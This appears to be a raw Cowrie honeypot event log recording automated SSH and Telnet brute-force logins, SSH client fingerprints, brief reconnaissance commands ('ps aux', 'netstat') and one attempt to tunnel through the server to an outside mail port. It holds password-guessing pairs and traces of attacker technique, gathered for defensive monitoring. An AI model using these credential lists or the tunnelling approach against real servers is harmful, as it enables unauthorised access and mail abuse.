{"eventid":"cowrie.session.closed","duration":46.14404582977295,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:50:56.171099Z","src_ip":"123.31.39.100","session":"2af7074cfd28"}
{"eventid":"cowrie.session.closed","duration":46.11771512031555,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:50:57.180957Z","src_ip":"212.227.235.229","session":"309bd3f72ef9"}
{"eventid":"cowrie.session.closed","duration":46.13523316383362,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:50:57.181953Z","src_ip":"212.227.125.160","session":"e4650da2219c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61815,"dst_ip":"1.2.3.4","dst_port":22,"session":"e50cea48f877","protocol":"ssh","message":"New connection: 212.227.235.229:61815 (1.2.3.4:22) [session: e50cea48f877]","sensor":"my-vps","timestamp":"2025-08-26T17:51:02.195167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T17:51:02.197233Z","src_ip":"212.227.235.229","session":"e50cea48f877"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T17:51:02.301065Z","src_ip":"212.227.235.229","session":"e50cea48f877"}
{"eventid":"cowrie.login.failed","username":"admin","password":"puma","message":"login attempt [admin/puma] failed","sensor":"my-vps","timestamp":"2025-08-26T17:51:02.797464Z","src_ip":"212.227.235.229","session":"e50cea48f877"}
{"eventid":"cowrie.login.failed","username":"admin","password":"princ","message":"login attempt [admin/princ] failed","sensor":"my-vps","timestamp":"2025-08-26T17:51:03.904715Z","src_ip":"212.227.235.229","session":"e50cea48f877"}
{"eventid":"cowrie.login.failed","username":"admin","password":"premiere","message":"login attempt [admin/premiere] failed","sensor":"my-vps","timestamp":"2025-08-26T17:51:05.013718Z","src_ip":"212.227.235.229","session":"e50cea48f877"}
{"eventid":"cowrie.login.failed","username":"admin","password":"porshe","message":"login attempt [admin/porshe] failed","sensor":"my-vps","timestamp":"2025-08-26T17:51:06.120832Z","src_ip":"212.227.235.229","session":"e50cea48f877"}
{"eventid":"cowrie.login.failed","username":"admin","password":"poi098","message":"login attempt [admin/poi098] failed","sensor":"my-vps","timestamp":"2025-08-26T17:51:07.227448Z","src_ip":"212.227.235.229","session":"e50cea48f877"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:51:08.333145Z","src_ip":"212.227.235.229","session":"e50cea48f877"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:51:23.303551Z","src_ip":"212.227.125.160","session":"49bb9ceaed04"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62152,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2ce81732a81","protocol":"ssh","message":"New connection: 217.72.205.35:62152 (1.2.3.4:22) [session: b2ce81732a81]","sensor":"my-vps","timestamp":"2025-08-26T17:51:38.427637Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:51:38.429114Z","src_ip":"217.72.205.35","session":"b2ce81732a81"}
{"eventid":"cowrie.session.connect","src_ip":"94.45.143.196","src_port":47277,"dst_ip":"1.2.3.4","dst_port":23,"session":"1b491e150b36","protocol":"telnet","message":"New connection: 94.45.143.196:47277 (1.2.3.4:23) [session: 1b491e150b36]","sensor":"my-vps","timestamp":"2025-08-26T17:52:17.896239Z"}
{"eventid":"cowrie.session.closed","duration":30.977359771728516,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:52:48.873531Z","src_ip":"94.45.143.196","session":"1b491e150b36"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:53:22.267741Z","src_ip":"212.227.235.229","session":"21e9ab848f30"}
{"eventid":"cowrie.session.closed","duration":180.26412272453308,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:53:22.273772Z","src_ip":"212.227.235.229","session":"21e9ab848f30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59723,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb1ceba9f17e","protocol":"ssh","message":"New connection: 212.227.125.160:59723 (1.2.3.4:22) [session: eb1ceba9f17e]","sensor":"my-vps","timestamp":"2025-08-26T17:53:28.667997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:53:29.013438Z","src_ip":"212.227.125.160","session":"eb1ceba9f17e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:53:29.432944Z","src_ip":"212.227.125.160","session":"eb1ceba9f17e"}
{"eventid":"cowrie.login.success","username":"root","password":"@combo21","message":"login attempt [root/@combo21] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:53:30.610447Z","src_ip":"212.227.125.160","session":"eb1ceba9f17e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:53:30.888904Z","src_ip":"212.227.125.160","session":"eb1ceba9f17e"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-26T17:53:30.889620Z","src_ip":"212.227.125.160","session":"eb1ceba9f17e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:53:31.026326Z","src_ip":"212.227.125.160","session":"eb1ceba9f17e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:53:31.041000Z","src_ip":"212.227.125.160","session":"eb1ceba9f17e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49532,"dst_ip":"1.2.3.4","dst_port":22,"session":"f03453da4280","protocol":"ssh","message":"New connection: 212.227.235.229:49532 (1.2.3.4:22) [session: f03453da4280]","sensor":"my-vps","timestamp":"2025-08-26T17:54:20.491785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:54:20.867810Z","src_ip":"212.227.235.229","session":"f03453da4280"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:54:20.868490Z","src_ip":"212.227.235.229","session":"f03453da4280"}
{"eventid":"cowrie.login.success","username":"root","password":"007700","message":"login attempt [root/007700] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:54:22.786261Z","src_ip":"212.227.235.229","session":"f03453da4280"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:54:24.273483Z","src_ip":"212.227.235.229","session":"f03453da4280"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48334,"dst_ip":"1.2.3.4","dst_port":23,"session":"451b50d28007","protocol":"telnet","message":"New connection: 212.227.235.229:48334 (1.2.3.4:23) [session: 451b50d28007]","sensor":"my-vps","timestamp":"2025-08-26T17:55:22.523404Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:55:22.723541Z","src_ip":"212.227.235.229","session":"451b50d28007"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:55:22.741200Z","src_ip":"212.227.235.229","session":"451b50d28007"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T17:55:22.742711Z","src_ip":"212.227.235.229","session":"451b50d28007"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T17:55:22.743555Z","src_ip":"212.227.235.229","session":"451b50d28007"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8989,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea18ceb0b9f0","protocol":"ssh","message":"New connection: 212.227.235.229:8989 (1.2.3.4:22) [session: ea18ceb0b9f0]","sensor":"my-vps","timestamp":"2025-08-26T17:57:27.563820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:57:30.424576Z","src_ip":"212.227.235.229","session":"ea18ceb0b9f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:57:30.425267Z","src_ip":"212.227.235.229","session":"ea18ceb0b9f0"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword64","message":"login attempt [root/P@ssword64] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:57:32.466554Z","src_ip":"212.227.235.229","session":"ea18ceb0b9f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:57:33.326823Z","src_ip":"212.227.235.229","session":"ea18ceb0b9f0"}
{"eventid":"cowrie.command.input","input":"netstat -tulpn | head -10","message":"CMD: netstat -tulpn | head -10","sensor":"my-vps","timestamp":"2025-08-26T17:57:33.327628Z","src_ip":"212.227.235.229","session":"ea18ceb0b9f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","size":28,"shasum":"f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5","duplicate":false,"duration":"3.3","message":"Closing TTY Log: var/lib/cowrie/tty/f03826b87738be788171c733375aae024407ba6f784b03d976676cd615c43ec5 after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:57:36.630286Z","src_ip":"212.227.235.229","session":"ea18ceb0b9f0"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:57:37.028328Z","src_ip":"212.227.235.229","session":"ea18ceb0b9f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39356,"dst_ip":"1.2.3.4","dst_port":22,"session":"68039250c821","protocol":"ssh","message":"New connection: 212.227.235.229:39356 (1.2.3.4:22) [session: 68039250c821]","sensor":"my-vps","timestamp":"2025-08-26T17:57:37.138813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T17:57:44.122007Z","src_ip":"212.227.235.229","session":"68039250c821"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T17:57:44.122803Z","src_ip":"212.227.235.229","session":"68039250c821"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:57:44.124494Z","src_ip":"212.227.235.229","session":"68039250c821"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33192,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd356753bde3","protocol":"ssh","message":"New connection: 212.227.235.229:33192 (1.2.3.4:22) [session: cd356753bde3]","sensor":"my-vps","timestamp":"2025-08-26T17:58:20.558715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T17:58:20.559837Z","src_ip":"212.227.235.229","session":"cd356753bde3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T17:58:20.685585Z","src_ip":"212.227.235.229","session":"cd356753bde3"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123456","message":"login attempt [root/admin123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:58:21.272547Z","src_ip":"212.227.235.229","session":"cd356753bde3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-26T17:58:21.400943Z","session":"cd356753bde3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-26T17:58:21.526825Z","src_ip":"212.227.235.229","session":"cd356753bde3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:58:21.658190Z","src_ip":"212.227.235.229","session":"cd356753bde3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:58:22.743297Z","src_ip":"212.227.235.229","session":"451b50d28007"}
{"eventid":"cowrie.session.closed","duration":180.2246754169464,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:58:22.747974Z","src_ip":"212.227.235.229","session":"451b50d28007"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51476,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c44125c4da5","protocol":"ssh","message":"New connection: 217.72.205.35:51476 (1.2.3.4:22) [session: 3c44125c4da5]","sensor":"my-vps","timestamp":"2025-08-26T17:58:23.781969Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:58:23.783483Z","src_ip":"217.72.205.35","session":"3c44125c4da5"}
{"eventid":"cowrie.session.connect","src_ip":"194.164.107.6","src_port":35060,"dst_ip":"1.2.3.4","dst_port":23,"session":"adab798573dc","protocol":"telnet","message":"New connection: 194.164.107.6:35060 (1.2.3.4:23) [session: adab798573dc]","sensor":"my-vps","timestamp":"2025-08-26T17:59:09.555314Z"}
{"eventid":"cowrie.session.closed","duration":0.0015377998352050781,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:59:09.556752Z","src_ip":"194.164.107.6","session":"adab798573dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9661,"dst_ip":"1.2.3.4","dst_port":22,"session":"95c7d9ec18eb","protocol":"ssh","message":"New connection: 212.227.235.229:9661 (1.2.3.4:22) [session: 95c7d9ec18eb]","sensor":"my-vps","timestamp":"2025-08-26T17:59:47.725661Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:59:47.727817Z","src_ip":"212.227.235.229","session":"95c7d9ec18eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":10012,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ae2a0a1a635","protocol":"ssh","message":"New connection: 212.227.235.229:10012 (1.2.3.4:22) [session: 3ae2a0a1a635]","sensor":"my-vps","timestamp":"2025-08-26T17:59:47.844056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:59:47.845032Z","src_ip":"212.227.235.229","session":"3ae2a0a1a635"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T17:59:47.973413Z","src_ip":"212.227.235.229","session":"3ae2a0a1a635"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:59:48.361399Z","src_ip":"212.227.235.229","session":"3ae2a0a1a635"}
